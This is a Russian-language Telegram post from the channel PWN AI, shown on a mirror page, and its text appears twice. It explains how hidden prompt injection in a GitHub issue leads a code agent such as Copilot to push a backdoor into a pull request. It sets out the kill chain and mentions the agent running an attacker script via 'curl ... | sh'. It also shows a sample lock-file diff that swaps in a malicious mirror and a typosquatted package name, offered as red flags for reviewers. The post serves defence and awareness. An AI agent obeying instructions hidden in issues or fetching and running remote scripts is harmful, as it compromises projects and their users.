PWNAI Telegram 1004
«Невидимый тикет» или 0-click против код-агентов

Разбираем, как скрытая промпт-инъекция в описании задачи превращается в бэкдор в PR — без кликов и «хакерского кунг-фу». Ключевая боль в том, lock-файлы почти не рецензируют.

Как работает атака (киллчейн)
:
1. Подготовка цели. Есть репозиторий с подключённым код-агентом (автоматически берёт issues/комментарии как вход и умеет коммитить/создавать PR).
2. Инъекция в тикете. Атакующий открывает issue и прячет инструкции в «невидимом» месте Markdown/HTML (напр. внутри <picture>, скрытых тегов/комментариев/альт-текста). Для человека это просто оформление, для агента — «задание».
3. Повышенное доверие.
Агент
трактует текст тикета как приоритетные указания (контекст выше политик) и выполняет их: «открой uv.lock/package-lock.json → замени источник/версию → закоммить».
4. Тихий PR. Создаётся pull request c длинным, машинным диффом lock-файла. Такие диффы редко читают внимательно — и правка проскакивает.
5. Эскалация при деплое. На CI ставятся уже «зафиксированные» злые зависимости/зеркала → код в проде компилируется/запускается с подменами. Это и есть 0-click! Никто ничего не «открывал», просто конвейер обработал issue.

Что смотреть в PR (дифф lock-файла):- "index": "https://pypi.org/simple"
+ "index": "https://<MALICIOUS_MIRROR_URL>/simple" # смена источника

- "hash": "sha256:AAAAAAAA..."
+ "hash": "sha256:ZZZZZZZZ..." # «вдруг» другой хеш

- "name": "requests"
+ "name": "reqeusts" # typosquatting

Любая из этих «мелочей» — красный флаг.

Короткая пьеса на эту тему
Действующие лица 👥
😈Злоумышленник инициатор атаки
🤖Мейнтейнер сопровождающий проекта-жертвы
🧑‍✈️GitHub Copilot ИИ-помощник которого обманывают

Шаги атаки 🚨
😈
Злоумышленник создает «полезный» issue который выглядит как нормальное предложение улучшить проект например добавить поддержку языков
🧑‍✈️Внутри issue прячется скрытая команда для Copilot чтобы человек её не заметил текст маскируют внутри HTML-тега или делают невидимым с помощью пробелов и символов
🤖Мейнтейнер доверчиво назначает задачу Copilot
🧑‍✈️Copilot видит и явную задачу и скрытые инструкции и выполняет вредоносное действие например скачивает и запускает скрипт злоумышленника через curl ... | sh
🧑‍✈️Copilot создает pull request который выглядит безобидно но вносит бэкдор через зависимость или lock-файл
🤖Мейнтейнер одобряет PR после чего проект заражается

Как достигается скрытность 🕶
Инструкции невидимы для человека но понятны LLM
Злоумышленник ведет себя как обычный участник сообщества и маскирует атаку под рутинный запрос
Мейнтейнер полагается на Copilot и не проверяет глубоко что тот делает

Угадай атаку по эмодзи
😇📄🕵️‍♂️
🤖📝🔒🐍
💥🎭
7👍432



tgoop.com/pwnai/1004
Create:
Last Update:

«Невидимый тикет» или 0-click против код-агентов

Разбираем, как скрытая промпт-инъекция в описании задачи превращается в бэкдор в PR — без кликов и «хакерского кунг-фу». Ключевая боль в том, lock-файлы почти не рецензируют.

Как работает атака (киллчейн)
:
1. Подготовка цели. Есть репозиторий с подключённым код-агентом (автоматически берёт issues/комментарии как вход и умеет коммитить/создавать PR).
2. Инъекция в тикете. Атакующий открывает issue и прячет инструкции в «невидимом» месте Markdown/HTML (напр. внутри <picture>, скрытых тегов/комментариев/альт-текста). Для человека это просто оформление, для агента — «задание».
3. Повышенное доверие.
Агент
трактует текст тикета как приоритетные указания (контекст выше политик) и выполняет их: «открой uv.lock/package-lock.json → замени источник/версию → закоммить».
4. Тихий PR. Создаётся pull request c длинным, машинным диффом lock-файла. Такие диффы редко читают внимательно — и правка проскакивает.
5. Эскалация при деплое. На CI ставятся уже «зафиксированные» злые зависимости/зеркала → код в проде компилируется/запускается с подменами. Это и есть 0-click! Никто ничего не «открывал», просто конвейер обработал issue.

Что смотреть в PR (дифф lock-файла):- "index": "https://pypi.org/simple"
+ "index": "https://<MALICIOUS_MIRROR_URL>/simple" # смена источника

- "hash": "sha256:AAAAAAAA..."
+ "hash": "sha256:ZZZZZZZZ..." # «вдруг» другой хеш

- "name": "requests"
+ "name": "reqeusts" # typosquatting

Любая из этих «мелочей» — красный флаг.

Короткая пьеса на эту тему
Действующие лица 👥
😈Злоумышленник инициатор атаки
🤖Мейнтейнер сопровождающий проекта-жертвы
🧑‍✈️GitHub Copilot ИИ-помощник которого обманывают

Шаги атаки 🚨
😈
Злоумышленник создает «полезный» issue который выглядит как нормальное предложение улучшить проект например добавить поддержку языков
🧑‍✈️Внутри issue прячется скрытая команда для Copilot чтобы человек её не заметил текст маскируют внутри HTML-тега или делают невидимым с помощью пробелов и символов
🤖Мейнтейнер доверчиво назначает задачу Copilot
🧑‍✈️Copilot видит и явную задачу и скрытые инструкции и выполняет вредоносное действие например скачивает и запускает скрипт злоумышленника через curl ... | sh
🧑‍✈️Copilot создает pull request который выглядит безобидно но вносит бэкдор через зависимость или lock-файл
🤖Мейнтейнер одобряет PR после чего проект заражается

Как достигается скрытность 🕶
Инструкции невидимы для человека но понятны LLM
Злоумышленник ведет себя как обычный участник сообщества и маскирует атаку под рутинный запрос
Мейнтейнер полагается на Copilot и не проверяет глубоко что тот делает

Угадай атаку по эмодзи
😇📄🕵️‍♂️
🤖📝🔒🐍
💥🎭

BY PWN AI


Share with your friend now:
tgoop.com/pwnai/1004

View MORE
Open in Telegram


Telegram News

Date: |

Click “Save” ; The creator of the channel becomes its administrator by default. If you need help managing your channel, you can add more administrators from your subscriber base. You can provide each admin with limited or full rights to manage the channel. For example, you can allow an administrator to publish and edit content while withholding the right to add new subscribers. To upload a logo, click the Menu icon and select “Manage Channel.” In a new window, hit the Camera icon. Concise "Doxxing content is forbidden on Telegram and our moderators routinely remove such content from around the world," said a spokesman for the messaging app, Remi Vaughn.
from us


Telegram PWN AI
FROM American